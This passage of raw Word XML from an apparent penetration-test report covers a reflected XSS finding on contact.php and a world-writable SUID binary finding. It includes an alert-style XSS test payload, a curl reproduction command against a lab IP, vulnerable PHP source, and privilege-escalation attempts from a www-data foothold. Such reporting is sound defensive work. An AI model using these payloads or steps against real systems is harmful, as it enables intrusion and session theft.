        <w:t>contact.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (parameter: status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABFB1FB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671BCA9D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>contact.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> endpoint reflects the value of the status GET parameter directly into the HTTP response without output encoding or sanitization, resulting in a reflected Cross-Site Scripting weakness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3038E079" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110849F7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Server-side source code confirms the unsafe pattern: $status = $_GET['status']; echo $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status; —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with no HTML-encoding applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A5191" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A test payload (&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt;) submitted via the status parameter was returned unescaped and intact within the HTML body of the HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E7CA11" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note on scope: HTTP-level reflection of the unescaped payload is confirmed by both the source code and the raw HTTP response. Execution of JavaScript in an actual browser (e.g., a captured </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) dialog) was attempted but not conclusively captured due to a URL/navigation issue during the browser-based test; this finding is therefore described as confirmed reflected XSS based on unsafe HTML reflection and vulnerable source code, not as a confirmed browser-executed exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FD653" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0E1A6D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Submit a test payload to the status parameter, e.g.: curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --data-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'status=&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt;' http://192.168.76.157/root/log_in/admin/contact.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27188D22" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Inspect the raw HTTP response body and confirm the payload is present, unescaped, inside the HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EB1A67" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D60E572" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The figure below shows the raw HTTP response confirming the unescaped reflection of the test payload within the page HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294EFBFD" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C24C14" wp14:editId="12ED6CF1">
            <wp:extent cx="5905500" cy="3771900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1727067138" name="Picture 1727067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3771900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5625EDE1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6. Reflected XSS payload returned unescaped in the HTTP response body from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>contact.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0823A9D5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3702BB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker able to induce a victim to follow a crafted link could have arbitrary HTML/JavaScript reflected and rendered in the victim's browser session, in the security context of the vulnerable page (e.g., for session/cookie theft, phishing, or UI redress attacks), subject to browser-side confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68709C2B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Risk Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43240E77" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Rated Medium: the vulnerable, unsafe reflection is clearly confirmed at the HTTP/source-code level, but full browser-side exploitation (e.g., a demonstrated JavaScript execution/alert) was not conclusively captured during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594BB3D6" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483EF2F5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Apply context-appropriate output encoding (e.g., HTML-entity encoding) to all user-supplied data before it is rendered in HTML responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FB6F28" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Adopt a templating framework that auto-escapes output by default rather than raw echo of request parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E41651" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Deploy a Content-Security-Policy (CSP) header as a defense-in-depth control to reduce the impact of any residual XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A38F186" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-07 — Writable SUID Binary / Dangerous File Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25968230" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t xml:space="preserve">HIGH (MISCONFIGURATION IDENTIFIED; EXPLOITATION NOT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>DEMONSTRATED)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: CWE-732 (Incorrect Permission Assignment for Critical Resource)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D437B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Asset: </w:t>
      </w:r>
      <w:r>
        <w:t>/home/defender/Downloads</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="09E28992" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C46F3E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A binary located at /home/defender/Downloads</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was found with the SUID bit set, owned by the local user "defender", and writable by all users (mode 4777 / -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwsrwxrwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). This is a serious file-permission misconfiguration. Execution of the binary from the www-data foothold was attempted but did not result in privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EC891F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11553DCF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>File listing confirms the permissions: -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwsrwxrwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1 defender </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 16896 Mar 8</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> 2021</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /home/defender/Downloads</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E30F5FC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stat output confirms: Access: (4777/-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwsrwxrwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: (1000/defender) Gid: (1000/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>defender) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> i.e., the SUID bit is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the file is writable by any user, including the low-privileged www-data account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0759787A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The binary was identified as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ELF 64-bit executable (confirmed via the file and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> utilities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6F8F14" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execution of the binary as www-data was attempted (including with --help and -h flags); in each case the resulting process identity remained </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=33(www-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>data) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> i.e., the SUID bit did not elevate the effective privilege of the calling user in the tests performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0B2ED" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296D24F0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>From the www-data foothold, list file permissions: ls -l /home/defender/Downloads</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and stat /home/defender/Downloads</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2EC1CF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Confirm SUID bit, ownership, and world-writable permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE0C00" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Attempt to execute the binary directly and check the resulting identity: /home/defender/Downloads</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">; id — the result remained </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=33(www-data), i.e., no escalation occurred in the tests performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAF21C3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAEED70" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The figure below shows the confirmed file permissions (SUID bit, world-writable, owned by defender) alongside the outcome of execution attempts, which returned </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=33(www-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>data) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> i.e., no successful privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D7B2FD" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39790C94" wp14:editId="73E457FD">
            <wp:extent cx="5905500" cy="3933825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="733918476" name="Picture 733918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933825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFA4A75" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 7. SUID binary permissions (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rwsrwxrwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, owner defender) and execution attempt from www-data, confirming the SUID bit did not elevate privileges in the tests performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46074D56" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212EA620" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A SUID binary that is also writable by any local user represents a significant misconfiguration: in principle, any user (including a low-privileged web-shell user such as www-data) could overwrite the binary's contents with attacker-controlled code, which would then execute with the file owner's (defender) privileges the next time it is invoked with elevated context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A7D0DA" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This engagement did not demonstrate successful privilege escalation via this vector; the tests performed (direct execution, help/usage flags) did not elevate privileges. Overwriting the binary and re-invoking it with SUID context was not attempted/completed during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6203E9A6" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Risk Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2776D2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
